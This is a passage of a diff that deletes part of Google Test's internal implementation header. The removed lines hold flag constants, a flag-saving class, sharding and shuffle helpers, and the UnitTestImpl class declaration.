-// declare it here as opposed to in gtest.h.
-GTEST_DECLARE_bool_(death_test_use_fork);
-
-namespace internal {
-
-// The value of GetTestTypeId() as seen from within the Google Test
-// library.  This is solely for testing GetTestTypeId().
-GTEST_API_ extern const TypeId kTestTypeIdInGoogleTest;
-
-// Names of the flags (needed for parsing Google Test flags).
-const char kAlsoRunDisabledTestsFlag[] = "also_run_disabled_tests";
-const char kBreakOnFailureFlag[] = "break_on_failure";
-const char kCatchExceptionsFlag[] = "catch_exceptions";
-const char kColorFlag[] = "color";
-const char kFilterFlag[] = "filter";
-const char kListTestsFlag[] = "list_tests";
-const char kOutputFlag[] = "output";
-const char kPrintTimeFlag[] = "print_time";
-const char kRandomSeedFlag[] = "random_seed";
-const char kRepeatFlag[] = "repeat";
-const char kShuffleFlag[] = "shuffle";
-const char kStackTraceDepthFlag[] = "stack_trace_depth";
-const char kStreamResultToFlag[] = "stream_result_to";
-const char kThrowOnFailureFlag[] = "throw_on_failure";
-
-// A valid random seed must be in [1, kMaxRandomSeed].
-const int kMaxRandomSeed = 99999;
-
-// g_help_flag is true iff the --help flag or an equivalent form is
-// specified on the command line.
-GTEST_API_ extern bool g_help_flag;
-
-// Returns the current time in milliseconds.
-GTEST_API_ TimeInMillis GetTimeInMillis();
-
-// Returns true iff Google Test should use colors in the output.
-GTEST_API_ bool ShouldUseColor(bool stdout_is_tty);
-
-// Formats the given time in milliseconds as seconds.
-GTEST_API_ std::string FormatTimeInMillisAsSeconds(TimeInMillis ms);
-
-// Converts the given time in milliseconds to a date string in the ISO 8601
-// format, without the timezone information.  N.B.: due to the use the
-// non-reentrant localtime() function, this function is not thread safe.  Do
-// not use it in any code that can be called from multiple threads.
-GTEST_API_ std::string FormatEpochTimeInMillisAsIso8601(TimeInMillis ms);
-
-// Parses a string for an Int32 flag, in the form of "--flag=value".
-//
-// On success, stores the value of the flag in *value, and returns
-// true.  On failure, returns false without changing *value.
-GTEST_API_ bool ParseInt32Flag(
-    const char* str, const char* flag, Int32* value);
-
-// Returns a random seed in range [1, kMaxRandomSeed] based on the
-// given --gtest_random_seed flag value.
-inline int GetRandomSeedFromFlag(Int32 random_seed_flag) {
-  const unsigned int raw_seed = (random_seed_flag == 0) ?
-      static_cast<unsigned int>(GetTimeInMillis()) :
-      static_cast<unsigned int>(random_seed_flag);
-
-  // Normalizes the actual seed to range [1, kMaxRandomSeed] such that
-  // it's easy to type.
-  const int normalized_seed =
-      static_cast<int>((raw_seed - 1U) %
-                       static_cast<unsigned int>(kMaxRandomSeed)) + 1;
-  return normalized_seed;
-}
-
-// Returns the first valid random seed after 'seed'.  The behavior is
-// undefined if 'seed' is invalid.  The seed after kMaxRandomSeed is
-// considered to be 1.
-inline int GetNextRandomSeed(int seed) {
-  GTEST_CHECK_(1 <= seed && seed <= kMaxRandomSeed)
-      << "Invalid random seed " << seed << " - must be in [1, "
-      << kMaxRandomSeed << "].";
-  const int next_seed = seed + 1;
-  return (next_seed > kMaxRandomSeed) ? 1 : next_seed;
-}
-
-// This class saves the values of all Google Test flags in its c'tor, and
-// restores them in its d'tor.
-class GTestFlagSaver {
- public:
-  // The c'tor.
-  GTestFlagSaver() {
-    also_run_disabled_tests_ = GTEST_FLAG(also_run_disabled_tests);
-    break_on_failure_ = GTEST_FLAG(break_on_failure);
-    catch_exceptions_ = GTEST_FLAG(catch_exceptions);
-    color_ = GTEST_FLAG(color);
-    death_test_style_ = GTEST_FLAG(death_test_style);
-    death_test_use_fork_ = GTEST_FLAG(death_test_use_fork);
-    filter_ = GTEST_FLAG(filter);
-    internal_run_death_test_ = GTEST_FLAG(internal_run_death_test);
-    list_tests_ = GTEST_FLAG(list_tests);
-    output_ = GTEST_FLAG(output);
-    print_time_ = GTEST_FLAG(print_time);
-    random_seed_ = GTEST_FLAG(random_seed);
-    repeat_ = GTEST_FLAG(repeat);
-    shuffle_ = GTEST_FLAG(shuffle);
-    stack_trace_depth_ = GTEST_FLAG(stack_trace_depth);
-    stream_result_to_ = GTEST_FLAG(stream_result_to);
-    throw_on_failure_ = GTEST_FLAG(throw_on_failure);
-  }
-
-  // The d'tor is not virtual.  DO NOT INHERIT FROM THIS CLASS.
-  ~GTestFlagSaver() {
-    GTEST_FLAG(also_run_disabled_tests) = also_run_disabled_tests_;
-    GTEST_FLAG(break_on_failure) = break_on_failure_;
-    GTEST_FLAG(catch_exceptions) = catch_exceptions_;
-    GTEST_FLAG(color) = color_;
-    GTEST_FLAG(death_test_style) = death_test_style_;
-    GTEST_FLAG(death_test_use_fork) = death_test_use_fork_;
-    GTEST_FLAG(filter) = filter_;
-    GTEST_FLAG(internal_run_death_test) = internal_run_death_test_;
-    GTEST_FLAG(list_tests) = list_tests_;
-    GTEST_FLAG(output) = output_;
-    GTEST_FLAG(print_time) = print_time_;
-    GTEST_FLAG(random_seed) = random_seed_;
-    GTEST_FLAG(repeat) = repeat_;
-    GTEST_FLAG(shuffle) = shuffle_;
-    GTEST_FLAG(stack_trace_depth) = stack_trace_depth_;
-    GTEST_FLAG(stream_result_to) = stream_result_to_;
-    GTEST_FLAG(throw_on_failure) = throw_on_failure_;
-  }
-
- private:
-  // Fields for saving the original values of flags.
-  bool also_run_disabled_tests_;
-  bool break_on_failure_;
-  bool catch_exceptions_;
-  std::string color_;
-  std::string death_test_style_;
-  bool death_test_use_fork_;
-  std::string filter_;
-  std::string internal_run_death_test_;
-  bool list_tests_;
-  std::string output_;
-  bool print_time_;
-  internal::Int32 random_seed_;
-  internal::Int32 repeat_;
-  bool shuffle_;
-  internal::Int32 stack_trace_depth_;
-  std::string stream_result_to_;
-  bool throw_on_failure_;
-} GTEST_ATTRIBUTE_UNUSED_;
-
-// Converts a Unicode code point to a narrow string in UTF-8 encoding.
-// code_point parameter is of type UInt32 because wchar_t may not be
-// wide enough to contain a code point.
-// If the code_point is not a valid Unicode code point
-// (i.e. outside of Unicode range U+0 to U+10FFFF) it will be converted
-// to "(Invalid Unicode 0xXXXXXXXX)".
-GTEST_API_ std::string CodePointToUtf8(UInt32 code_point);
-
-// Converts a wide string to a narrow string in UTF-8 encoding.
-// The wide string is assumed to have the following encoding:
-//   UTF-16 if sizeof(wchar_t) == 2 (on Windows, Cygwin, Symbian OS)
-//   UTF-32 if sizeof(wchar_t) == 4 (on Linux)
-// Parameter str points to a null-terminated wide string.
-// Parameter num_chars may additionally limit the number
-// of wchar_t characters processed. -1 is used when the entire string
-// should be processed.
-// If the string contains code points that are not valid Unicode code points
-// (i.e. outside of Unicode range U+0 to U+10FFFF) they will be output
-// as '(Invalid Unicode 0xXXXXXXXX)'. If the string is in UTF16 encoding
-// and contains invalid UTF-16 surrogate pairs, values in those pairs
-// will be encoded as individual Unicode characters from Basic Normal Plane.
-GTEST_API_ std::string WideStringToUtf8(const wchar_t* str, int num_chars);
-
-// Reads the GTEST_SHARD_STATUS_FILE environment variable, and creates the file
-// if the variable is present. If a file already exists at this location, this
-// function will write over it. If the variable is present, but the file cannot
-// be created, prints an error and exits.
-void WriteToShardStatusFileIfNeeded();
-
-// Checks whether sharding is enabled by examining the relevant
-// environment variable values. If the variables are present,
-// but inconsistent (e.g., shard_index >= total_shards), prints
-// an error and exits. If in_subprocess_for_death_test, sharding is
-// disabled because it must only be applied to the original test
-// process. Otherwise, we could filter out death tests we intended to execute.
-GTEST_API_ bool ShouldShard(const char* total_shards_str,
-                            const char* shard_index_str,
-                            bool in_subprocess_for_death_test);
-
-// Parses the environment variable var as an Int32. If it is unset,
-// returns default_val. If it is not an Int32, prints an error and
-// aborts.
-GTEST_API_ Int32 Int32FromEnvOrDie(const char* env_var, Int32 default_val);
-
-// Given the total number of shards, the shard index, and the test id,
-// returns true iff the test should be run on this shard. The test id is
-// some arbitrary but unique non-negative integer assigned to each test
-// method. Assumes that 0 <= shard_index < total_shards.
-GTEST_API_ bool ShouldRunTestOnShard(
-    int total_shards, int shard_index, int test_id);
-
-// STL container utilities.
-
-// Returns the number of elements in the given container that satisfy
-// the given predicate.
-template <class Container, typename Predicate>
-inline int CountIf(const Container& c, Predicate predicate) {
-  // Implemented as an explicit loop since std::count_if() in libCstd on
-  // Solaris has a non-standard signature.
-  int count = 0;
-  for (typename Container::const_iterator it = c.begin(); it != c.end(); ++it) {
-    if (predicate(*it))
-      ++count;
-  }
-  return count;
-}
-
-// Applies a function/functor to each element in the container.
-template <class Container, typename Functor>
-void ForEach(const Container& c, Functor functor) {
-  std::for_each(c.begin(), c.end(), functor);
-}
-
-// Returns the i-th element of the vector, or default_value if i is not
-// in range [0, v.size()).
-template <typename E>
-inline E GetElementOr(const std::vector<E>& v, int i, E default_value) {
-  return (i < 0 || i >= static_cast<int>(v.size())) ? default_value : v[i];
-}
-
-// Performs an in-place shuffle of a range of the vector's elements.
-// 'begin' and 'end' are element indices as an STL-style range;
-// i.e. [begin, end) are shuffled, where 'end' == size() means to
-// shuffle to the end of the vector.
-template <typename E>
-void ShuffleRange(internal::Random* random, int begin, int end,
-                  std::vector<E>* v) {
-  const int size = static_cast<int>(v->size());
-  GTEST_CHECK_(0 <= begin && begin <= size)
-      << "Invalid shuffle range start " << begin << ": must be in range [0, "
-      << size << "].";
-  GTEST_CHECK_(begin <= end && end <= size)
-      << "Invalid shuffle range finish " << end << ": must be in range ["
-      << begin << ", " << size << "].";
-
-  // Fisher-Yates shuffle, from
-  // http://en.wikipedia.org/wiki/Fisher-Yates_shuffle
-  for (int range_width = end - begin; range_width >= 2; range_width--) {
-    const int last_in_range = begin + range_width - 1;
-    const int selected = begin + random->Generate(range_width);
-    std::swap((*v)[selected], (*v)[last_in_range]);
-  }
-}
-
-// Performs an in-place shuffle of the vector's elements.
-template <typename E>
-inline void Shuffle(internal::Random* random, std::vector<E>* v) {
-  ShuffleRange(random, 0, static_cast<int>(v->size()), v);
-}
-
-// A function for deleting an object.  Handy for being used as a
-// functor.
-template <typename T>
-static void Delete(T* x) {
-  delete x;
-}
-
-// A predicate that checks the key of a TestProperty against a known key.
-//
-// TestPropertyKeyIs is copyable.
-class TestPropertyKeyIs {
- public:
-  // Constructor.
-  //
-  // TestPropertyKeyIs has NO default constructor.
-  explicit TestPropertyKeyIs(const std::string& key) : key_(key) {}
-
-  // Returns true iff the test name of test property matches on key_.
-  bool operator()(const TestProperty& test_property) const {
-    return test_property.key() == key_;
-  }
-
- private:
-  std::string key_;
-};
-
-// Class UnitTestOptions.
-//
-// This class contains functions for processing options the user
-// specifies when running the tests.  It has only static members.
-//
-// In most cases, the user can specify an option using either an
-// environment variable or a command line flag.  E.g. you can set the
-// test filter using either GTEST_FILTER or --gtest_filter.  If both
-// the variable and the flag are present, the latter overrides the
-// former.
-class GTEST_API_ UnitTestOptions {
- public:
-  // Functions for processing the gtest_output flag.
-
-  // Returns the output format, or "" for normal printed output.
-  static std::string GetOutputFormat();
-
-  // Returns the absolute path of the requested output file, or the
-  // default (test_detail.xml in the original working directory) if
-  // none was explicitly specified.
-  static std::string GetAbsolutePathToOutputFile();
-
-  // Functions for processing the gtest_filter flag.
-
-  // Returns true iff the wildcard pattern matches the string.  The
-  // first ':' or '\0' character in pattern marks the end of it.
-  //
-  // This recursive algorithm isn't very efficient, but is clear and
-  // works well enough for matching test names, which are short.
-  static bool PatternMatchesString(const char *pattern, const char *str);
-
-  // Returns true iff the user-specified filter matches the test case
-  // name and the test name.
-  static bool FilterMatchesTest(const std::string &test_case_name,
-                                const std::string &test_name);
-
-#if GTEST_OS_WINDOWS
-  // Function for supporting the gtest_catch_exception flag.
-
-  // Returns EXCEPTION_EXECUTE_HANDLER if Google Test should handle the
-  // given SEH exception, or EXCEPTION_CONTINUE_SEARCH otherwise.
-  // This function is useful as an __except condition.
-  static int GTestShouldProcessSEH(DWORD exception_code);
-#endif  // GTEST_OS_WINDOWS
-
-  // Returns true if "name" matches the ':' separated list of glob-style
-  // filters in "filter".
-  static bool MatchesFilter(const std::string& name, const char* filter);
-};
-
-// Returns the current application's name, removing directory path if that
-// is present.  Used by UnitTestOptions::GetOutputFile.
-GTEST_API_ FilePath GetCurrentExecutableName();
-
-// The role interface for getting the OS stack trace as a string.
-class OsStackTraceGetterInterface {
- public:
-  OsStackTraceGetterInterface() {}
-  virtual ~OsStackTraceGetterInterface() {}
-
-  // Returns the current OS stack trace as an std::string.  Parameters:
-  //
-  //   max_depth  - the maximum number of stack frames to be included
-  //                in the trace.
-  //   skip_count - the number of top frames to be skipped; doesn't count
-  //                against max_depth.
-  virtual string CurrentStackTrace(int max_depth, int skip_count) = 0;
-
-  // UponLeavingGTest() should be called immediately before Google Test calls
-  // user code. It saves some information about the current stack that
-  // CurrentStackTrace() will use to find and hide Google Test stack frames.
-  virtual void UponLeavingGTest() = 0;
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(OsStackTraceGetterInterface);
-};
-
-// A working implementation of the OsStackTraceGetterInterface interface.
-class OsStackTraceGetter : public OsStackTraceGetterInterface {
- public:
-  OsStackTraceGetter() : caller_frame_(NULL) {}
-
-  virtual string CurrentStackTrace(int max_depth, int skip_count)
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  virtual void UponLeavingGTest() GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // This string is inserted in place of stack frames that are part of
-  // Google Test's implementation.
-  static const char* const kElidedFramesMarker;
-
- private:
-  Mutex mutex_;  // protects all internal state
-
-  // We save the stack frame below the frame that calls user code.
-  // We do this because the address of the frame immediately below
-  // the user code changes between the call to UponLeavingGTest()
-  // and any calls to CurrentStackTrace() from within the user code.
-  void* caller_frame_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(OsStackTraceGetter);
-};
-
-// Information about a Google Test trace point.
-struct TraceInfo {
-  const char* file;
-  int line;
-  std::string message;
-};
-
-// This is the default global test part result reporter used in UnitTestImpl.
-// This class should only be used by UnitTestImpl.
-class DefaultGlobalTestPartResultReporter
-  : public TestPartResultReporterInterface {
- public:
-  explicit DefaultGlobalTestPartResultReporter(UnitTestImpl* unit_test);
-  // Implements the TestPartResultReporterInterface. Reports the test part
-  // result in the current test.
-  virtual void ReportTestPartResult(const TestPartResult& result);
-
- private:
-  UnitTestImpl* const unit_test_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(DefaultGlobalTestPartResultReporter);
-};
-
-// This is the default per thread test part result reporter used in
-// UnitTestImpl. This class should only be used by UnitTestImpl.
-class DefaultPerThreadTestPartResultReporter
-    : public TestPartResultReporterInterface {
- public:
-  explicit DefaultPerThreadTestPartResultReporter(UnitTestImpl* unit_test);
-  // Implements the TestPartResultReporterInterface. The implementation just
-  // delegates to the current global test part result reporter of *unit_test_.
-  virtual void ReportTestPartResult(const TestPartResult& result);
-
- private:
-  UnitTestImpl* const unit_test_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(DefaultPerThreadTestPartResultReporter);
-};
-
-// The private implementation of the UnitTest class.  We don't protect
-// the methods under a mutex, as this class is not accessible by a
-// user and the UnitTest class that delegates work to this class does
-// proper locking.
-class GTEST_API_ UnitTestImpl {
- public:
-  explicit UnitTestImpl(UnitTest* parent);
-  virtual ~UnitTestImpl();
-
-  // There are two different ways to register your own TestPartResultReporter.
-  // You can register your own repoter to listen either only for test results
-  // from the current thread or for results from all threads.
-  // By default, each per-thread test result repoter just passes a new
-  // TestPartResult to the global test result reporter, which registers the
-  // test part result for the currently running test.
-
-  // Returns the global test part result reporter.
-  TestPartResultReporterInterface* GetGlobalTestPartResultReporter();
-
-  // Sets the global test part result reporter.
-  void SetGlobalTestPartResultReporter(
-      TestPartResultReporterInterface* reporter);
-
-  // Returns the test part result reporter for the current thread.
-  TestPartResultReporterInterface* GetTestPartResultReporterForCurrentThread();
-
-  // Sets the test part result reporter for the current thread.
-  void SetTestPartResultReporterForCurrentThread(
-      TestPartResultReporterInterface* reporter);
-
-  // Gets the number of successful test cases.
-  int successful_test_case_count() const;
-
-  // Gets the number of failed test cases.
-  int failed_test_case_count() const;
-
-  // Gets the number of all test cases.
-  int total_test_case_count() const;
-
-  // Gets the number of all test cases that contain at least one test
-  // that should run.
-  int test_case_to_run_count() const;
-
-  // Gets the number of successful tests.
-  int successful_test_count() const;
-
-  // Gets the number of failed tests.
-  int failed_test_count() const;
-
-  // Gets the number of disabled tests that will be reported in the XML report.
-  int reportable_disabled_test_count() const;
-
-  // Gets the number of disabled tests.
-  int disabled_test_count() const;
-
-  // Gets the number of tests to be printed in the XML report.
-  int reportable_test_count() const;
-
-  // Gets the number of all tests.
-  int total_test_count() const;
-
-  // Gets the number of tests that should run.
-  int test_to_run_count() const;
-
-  // Gets the time of the test program start, in ms from the start of the
-  // UNIX epoch.
-  TimeInMillis start_timestamp() const { return start_timestamp_; }
-
-  // Gets the elapsed time, in milliseconds.
-  TimeInMillis elapsed_time() const { return elapsed_time_; }
-
-  // Returns true iff the unit test passed (i.e. all test cases passed).
-  bool Passed() const { return !Failed(); }
-
-  // Returns true iff the unit test failed (i.e. some test case failed
-  // or something outside of all tests failed).
-  bool Failed() const {
-    return failed_test_case_count() > 0 || ad_hoc_test_result()->Failed();
-  }
-
-  // Gets the i-th test case among all the test cases. i can range from 0 to
-  // total_test_case_count() - 1. If i is not in that range, returns NULL.
-  const TestCase* GetTestCase(int i) const {
-    const int index = GetElementOr(test_case_indices_, i, -1);
-    return index < 0 ? NULL : test_cases_[i];
-  }
-
-  // Gets the i-th test case among all the test cases. i can range from 0 to
-  // total_test_case_count() - 1. If i is not in that range, returns NULL.
-  TestCase* GetMutableTestCase(int i) {
-    const int index = GetElementOr(test_case_indices_, i, -1);
-    return index < 0 ? NULL : test_cases_[index];
-  }
-
-  // Provides access to the event listener list.
-  TestEventListeners* listeners() { return &listeners_; }
-
-  // Returns the TestResult for the test that's currently running, or
-  // the TestResult for the ad hoc test if no test is running.
-  TestResult* current_test_result();
-
-  // Returns the TestResult for the ad hoc test.
-  const TestResult* ad_hoc_test_result() const { return &ad_hoc_test_result_; }
-
-  // Sets the OS stack trace getter.
-  //
-  // Does nothing if the input and the current OS stack trace getter
-  // are the same; otherwise, deletes the old getter and makes the
-  // input the current getter.
-  void set_os_stack_trace_getter(OsStackTraceGetterInterface* getter);
-
-  // Returns the current OS stack trace getter if it is not NULL;
-  // otherwise, creates an OsStackTraceGetter, makes it the current
-  // getter, and returns it.
-  OsStackTraceGetterInterface* os_stack_trace_getter();
-
-  // Returns the current OS stack trace as an std::string.
-  //
-  // The maximum number of stack frames to be included is specified by
-  // the gtest_stack_trace_depth flag.  The skip_count parameter
-  // specifies the number of top frames to be skipped, which doesn't
-  // count against the number of frames to be included.
-  //
-  // For example, if Foo() calls Bar(), which in turn calls
-  // CurrentOsStackTraceExceptTop(1), Foo() will be included in the
-  // trace but Bar() and CurrentOsStackTraceExceptTop() won't.
-  std::string CurrentOsStackTraceExceptTop(int skip_count) GTEST_NO_INLINE_;
-
-  // Finds and returns a TestCase with the given name.  If one doesn't
-  // exist, creates one and returns it.
-  //
-  // Arguments:
-  //
-  //   test_case_name: name of the test case
-  //   type_param:     the name of the test's type parameter, or NULL if
-  //                   this is not a typed or a type-parameterized test.
-  //   set_up_tc:      pointer to the function that sets up the test case
-  //   tear_down_tc:   pointer to the function that tears down the test case
-  TestCase* GetTestCase(const char* test_case_name,
-                        const char* type_param,
-                        Test::SetUpTestCaseFunc set_up_tc,
-                        Test::TearDownTestCaseFunc tear_down_tc);
-
-  // Adds a TestInfo to the unit test.
-  //
-  // Arguments:
-  //
-  //   set_up_tc:    pointer to the function that sets up the test case
-  //   tear_down_tc: pointer to the function that tears down the test case
-  //   test_info:    the TestInfo object
-  void AddTestInfo(Test::SetUpTestCaseFunc set_up_tc,
-                   Test::TearDownTestCaseFunc tear_down_tc,
-                   TestInfo* test_info) {
-    // In order to support thread-safe death tests, we need to
-    // remember the original working directory when the test program
-    // was first invoked.  We cannot do this in RUN_ALL_TESTS(), as
-    // the user may have changed the current directory before calling
-    // RUN_ALL_TESTS().  Therefore we capture the current directory in
-    // AddTestInfo(), which is called to register a TEST or TEST_F
-    // before main() is reached.
-    if (original_working_dir_.IsEmpty()) {
-      original_working_dir_.Set(FilePath::GetCurrentDir());
-      GTEST_CHECK_(!original_working_dir_.IsEmpty())
-          << "Failed to get the current working directory.";
-    }
-
-    GetTestCase(test_info->test_case_name(),
-                test_info->type_param(),
-                set_up_tc,
-                tear_down_tc)->AddTestInfo(test_info);
-  }
-
-#if GTEST_HAS_PARAM_TEST
-  // Returns ParameterizedTestCaseRegistry object used to keep track of
-  // value-parameterized tests and instantiate and register them.
-  internal::ParameterizedTestCaseRegistry& parameterized_test_registry() {
-    return parameterized_test_registry_;
-  }
-#endif  // GTEST_HAS_PARAM_TEST
-
-  // Sets the TestCase object for the test that's currently running.
-  void set_current_test_case(TestCase* a_current_test_case) {
-    current_test_case_ = a_current_test_case;
-  }
-
-  // Sets the TestInfo object for the test that's currently running.  If
-  // current_test_info is NULL, the assertion results will be stored in
-  // ad_hoc_test_result_.
-  void set_current_test_info(TestInfo* a_current_test_info) {
-    current_test_info_ = a_current_test_info;
-  }
-
-  // Registers all parameterized tests defined using TEST_P and
-  // INSTANTIATE_TEST_CASE_P, creating regular tests for each test/parameter
-  // combination. This method can be called more then once; it has guards
-  // protecting from registering the tests more then once.  If
-  // value-parameterized tests are disabled, RegisterParameterizedTests is
-  // present but does nothing.
-  void RegisterParameterizedTests();
-
-  // Runs all tests in this UnitTest object, prints the result, and
-  // returns true if all tests are successful.  If any exception is
-  // thrown during a test, this test is considered to be failed, but
-  // the rest of the tests will still be run.
-  bool RunAllTests();
-
-  // Clears the results of all tests, except the ad hoc tests.
-  void ClearNonAdHocTestResult() {
-    ForEach(test_cases_, TestCase::ClearTestCaseResult);
-  }
-
-  // Clears the results of ad-hoc test assertions.
-  void ClearAdHocTestResult() {
-    ad_hoc_test_result_.Clear();
-  }
-
-  // Adds a TestProperty to the current TestResult object when invoked in a
-  // context of a test or a test case, or to the global property set. If the
-  // result already contains a property with the same key, the value will be
-  // updated.
-  void RecordProperty(const TestProperty& test_property);
-
-  enum ReactionToSharding {
-    HONOR_SHARDING_PROTOCOL,
-    IGNORE_SHARDING_PROTOCOL
-  };
-
-  // Matches the full name of each test against the user-specified
-  // filter to decide whether the test should run, then records the
-  // result in each TestCase and TestInfo object.
-  // If shard_tests == HONOR_SHARDING_PROTOCOL, further filters tests
-  // based on sharding variables in the environment.
-  // Returns the number of tests that should run.
-  int FilterTests(ReactionToSharding shard_tests);
-
-  // Prints the names of the tests matching the user-specified filter flag.
-  void ListTestsMatchingFilter();
-
-  const TestCase* current_test_case() const { return current_test_case_; }
-  TestInfo* current_test_info() { return current_test_info_; }
-  const TestInfo* current_test_info() const { return current_test_info_; }
-
-  // Returns the vector of environments that need to be set-up/torn-down
-  // before/after the tests are run.
-  std::vector<Environment*>& environments() { return environments_; }
-
-  // Getters for the per-thread Google Test trace stack.
-  std::vector<TraceInfo>& gtest_trace_stack() {
-    return *(gtest_trace_stack_.pointer());
-  }
-  const std::vector<TraceInfo>& gtest_trace_stack() const {
-    return gtest_trace_stack_.get();
-  }
-
-#if GTEST_HAS_DEATH_TEST
-  void InitDeathTestSubprocessControlInfo() {
-    internal_run_death_test_flag_.reset(ParseInternalRunDeathTestFlag());
-  }
-  // Returns a pointer to the parsed --gtest_internal_run_death_test
-  // flag, or NULL if that flag was not specified.
-  // This information is useful only in a death test child process.
-  // Must not be called before a call to InitGoogleTest.
-  const InternalRunDeathTestFlag* internal_run_death_test_flag() const {
-    return internal_run_death_test_flag_.get();
-  }
-
-  // Returns a pointer to the current death test factory.
-  internal::DeathTestFactory* death_test_factory() {
-    return death_test_factory_.get();
-  }
-
-  void SuppressTestEventsIfInSubprocess();
-
-  friend class ReplaceDeathTestFactory;
-#endif  // GTEST_HAS_DEATH_TEST
-
-  // Initializes the event listener performing XML output as specified by
-  // UnitTestOptions. Must not be called before InitGoogleTest.
-  void ConfigureXmlOutput();
-
-#if GTEST_CAN_STREAM_RESULTS_
-  // Initializes the event listener for streaming test results to a socket.
-  // Must not be called before InitGoogleTest.
-  void ConfigureStreamingOutput();
-#endif
-
-  // Performs initialization dependent upon flag values obtained in
-  // ParseGoogleTestFlagsOnly.  Is called from InitGoogleTest after the call to
-  // ParseGoogleTestFlagsOnly.  In case a user neglects to call InitGoogleTest
-  // this function is also called from RunAllTests.  Since this function can be
-  // called more than once, it has to be idempotent.
-  void PostFlagParsingInit();
-
-  // Gets the random seed used at the start of the current test iteration.
-  int random_seed() const { return random_seed_; }
-
-  // Gets the random number generator.
-  internal::Random* random() { return &random_; }
-
-  // Shuffles all test cases, and the tests within each test case,
-  // making sure that death tests are still run first.
-  void ShuffleTests();
-
-  // Restores the test cases and tests to their order before the first shuffle.
-  void UnshuffleTests();
-
-  // Returns the value of GTEST_FLAG(catch_exceptions) at the moment
-  // UnitTest::Run() starts.
-  bool catch_exceptions() const { return catch_exceptions_; }
-
- private:
-  friend class ::testing::UnitTest;
-
-  // Used by UnitTest::Run() to capture the state of
-  // GTEST_FLAG(catch_exceptions) at the moment it starts.
-  void set_catch_exceptions(bool value) { catch_exceptions_ = value; }
-
-  // The UnitTest object that owns this implementation object.
-  UnitTest* const parent_;
-
-  // The working directory when the first TEST() or TEST_F() was
-  // executed.
-  internal::FilePath original_working_dir_;
-
-  // The default test part result reporters.
-  DefaultGlobalTestPartResultReporter default_global_test_part_result_reporter_;
-  DefaultPerThreadTestPartResultReporter
-      default_per_thread_test_part_result_reporter_;
-
-  // Points to (but doesn't own) the global test part result reporter.
-  TestPartResultReporterInterface* global_test_part_result_repoter_;
-
-  // Protects read and write access to global_test_part_result_reporter_.
-  internal::Mutex global_test_part_result_reporter_mutex_;
-
-  // Points to (but doesn't own) the per-thread test part result reporter.
-  internal::ThreadLocal<TestPartResultReporterInterface*>
-      per_thread_test_part_result_reporter_;
-
-  // The vector of environments that need to be set-up/torn-down
-  // before/after the tests are run.
-  std::vector<Environment*> environments_;
-
-  // The vector of TestCases in their original order.  It owns the
-  // elements in the vector.
-  std::vector<TestCase*> test_cases_;
-
-  // Provides a level of indirection for the test case list to allow
-  // easy shuffling and restoring the test case order.  The i-th
-  // element of this vector is the index of the i-th test case in the
-  // shuffled order.
-  std::vector<int> test_case_indices_;
-
-#if GTEST_HAS_PARAM_TEST
-  // ParameterizedTestRegistry object used to register value-parameterized
-  // tests.
-  internal::ParameterizedTestCaseRegistry parameterized_test_registry_;
-
-  // Indicates whether RegisterParameterizedTests() has been called already.
-  bool parameterized_tests_registered_;
-#endif  // GTEST_HAS_PARAM_TEST
-
-  // Index of the last death test case registered.  Initially -1.
-  int last_death_test_case_;
-
-  // This points to the TestCase for the currently running test.  It
-  // changes as Google Test goes through one test case after another.
-  // When no test is running, this is set to NULL and Google Test
-  // stores assertion results in ad_hoc_test_result_.  Initially NULL.
-  TestCase* current_test_case_;
-
-  // This points to the TestInfo for the currently running test.  It
-  // changes as Google Test goes through one test after another.  When
-  // no test is running, this is set to NULL and Google Test stores
-  // assertion results in ad_hoc_test_result_.  Initially NULL.
-  TestInfo* current_test_info_;
-
-  // Normally, a user only writes assertions inside a TEST or TEST_F,
-  // or inside a function called by a TEST or TEST_F.  Since Google
-  // Test keeps track of which test is current running, it can
-  // associate such an assertion with the test it belongs to.
-  //
-  // If an assertion is encountered when no TEST or TEST_F is running,
-  // Google Test attributes the assertion result to an imaginary "ad hoc"
-  // test, and records the result in ad_hoc_test_result_.
-  TestResult ad_hoc_test_result_;
-
-  // The list of event listeners that can be used to track events inside
-  // Google Test.
-  TestEventListeners listeners_;
-
-  // The OS stack trace getter.  Will be deleted when the UnitTest
-  // object is destructed.  By default, an OsStackTraceGetter is used,
-  // but the user can set this field to use a custom getter if that is
-  // desired.
-  OsStackTraceGetterInterface* os_stack_trace_getter_;
-
-  // True iff PostFlagParsingInit() has been called.
-  bool post_flag_parse_init_performed_;
-
-  // The random number seed used at the beginning of the test run.
-  int random_seed_;
-
-  // Our random number generator.
-  internal::Random random_;
-
-  // The time of the test program start, in ms from the start of the
-  // UNIX epoch.
-  TimeInMillis start_timestamp_;
-
-  // How long the test took to run, in milliseconds.
-  TimeInMillis elapsed_time_;
-
-#if GTEST_HAS_DEATH_TEST
-  // The decomposed components of the gtest_internal_run_death_test flag,
-  // parsed when RUN_ALL_TESTS is called.
-  internal::scoped_ptr<InternalRunDeathTestFlag> internal_run_death_test_flag_;
-  internal::scoped_ptr<internal::DeathTestFactory> death_test_factory_;
-#endif  // GTEST_HAS_DEATH_TEST
-
-  // A per-thread stack of traces created by the SCOPED_TRACE() macro.
-  internal::ThreadLocal<std::vector<TraceInfo> > gtest_trace_stack_;
-
-  // The value of GTEST_FLAG(catch_exceptions) at the moment RunAllTests()
-  // starts.
-  bool catch_exceptions_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(UnitTestImpl);
-};  // class UnitTestImpl
-
-// Convenience function for accessing the global UnitTest
-// implementation object.
-inline UnitTestImpl* GetUnitTestImpl() {
-  return UnitTest::GetInstance()->impl();
-}
-
-#if GTEST_USES_SIMPLE_RE
-
-// Internal helper functions for implementing the simple regular
-// expression matcher.
-GTEST_API_ bool IsInSet(char ch, const char* str);
-GTEST_API_ bool IsAsciiDigit(char ch);
-GTEST_API_ bool IsAsciiPunct(char ch);
-GTEST_API_ bool IsRepeat(char ch);
-GTEST_API_ bool IsAsciiWhiteSpace(char ch);
-GTEST_API_ bool IsAsciiWordChar(char ch);
-GTEST_API_ bool IsValidEscape(char ch);
-GTEST_API_ bool AtomMatchesChar(bool escaped, char pattern, char ch);
-GTEST_API_ bool ValidateRegex(const char* regex);
-GTEST_API_ bool MatchRegexAtHead(const char* regex, const char* str);
